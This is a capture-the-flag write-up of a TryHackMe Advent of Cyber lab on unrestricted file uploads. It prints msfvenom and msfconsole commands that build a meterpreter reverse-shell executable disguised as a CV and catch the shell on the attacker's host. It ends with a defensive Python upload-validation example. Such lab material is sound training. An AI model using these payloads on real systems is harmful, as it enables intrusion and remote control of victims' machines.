Writeup: Advent of Cyber 4 Day 15
Link: Advent Of Cyber 4 on TryHackMe
What is the name given to file uploads that allow threat actors to upload any files that they want?
Answer: Unrestricted
What is the title of the web application developed by Santa's freelancer?
Answer: SantaSideKick2
What is the value of the flag stored in the HR Elf's Documents directory?
We start by using msfvenom to create a malicious executable:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT="4321" -f exe -o cv-maya.exe
We then tell the shell to create a reverse shell handler, with automatic meterpreter elevation:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST $IP; set LPORT '4321'; exploit"
We then upload our "CV" to the platform:
The "CV" gets executed, leading us to a meterpreter session:
We situate ourselves and then navigate to the target directory to get the flag:
Answer: THM{Naughty.File.Uploads.Can.Get.You.RCE}
What defence technique can be implemented to ensure that specific file types can be uploaded?
Answer: File Extension Validation
What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?
Answer: File Renaming
What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?
Answer: Malware Scanning
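
The first two defences named above, plus a content check that would have refused the executable "CV" used in this writeup, sketched as an added example (not code from the room or from this writeup). The function name, the allowlist and the sample inputs are assumptions made for illustration; malware scanning is a separate step and is not shown.

```python
import os
import tempfile
import uuid

# Assumed allowlist for a CV upload form: extension -> required leading bytes.
ALLOWED = {".pdf": b"%PDF-", ".docx": b"PK\x03\x04"}  # DOCX is a ZIP container

class UploadRejected(Exception):
    """Raised when an upload fails validation."""

def store_upload(original_name: str, data: bytes, upload_dir: str) -> str:
    """Validate an upload and store it under a random name; return that name."""
    # Drop any client-supplied directory part (either separator style).
    base = os.path.basename(original_name.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    # 1. File extension validation: only allowlisted types are accepted.
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # 2. Content check: the leading bytes must match the claimed type, so a
    #    Windows executable (starts with "MZ") renamed to .pdf is refused.
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # 3. File renaming: the stored name is random, so the uploader cannot
    #    find the file again by its original name.
    stored_name = uuid.uuid4().hex + ext
    # upload_dir is assumed to sit outside the web root and not be executable.
    with open(os.path.join(upload_dir, stored_name), "xb") as fh:
        fh.write(data)
    return stored_name

def demo() -> list:
    """Run constructed samples through store_upload and report the outcomes."""
    samples = [  # constructed inputs, not real files
        ("cv-maya.exe", b"MZ\x90\x00"),
        ("cv-maya.pdf", b"MZ\x90\x00"),
        ("cv-maya.pdf", b"%PDF-1.7\n"),
    ]
    results = []
    with tempfile.TemporaryDirectory() as d:
        for name, data in samples:
            try:
                store_upload(name, data, d)
                results.append("stored")
            except UploadRejected as exc:
                results.append(f"rejected: {exc}")
    return results
```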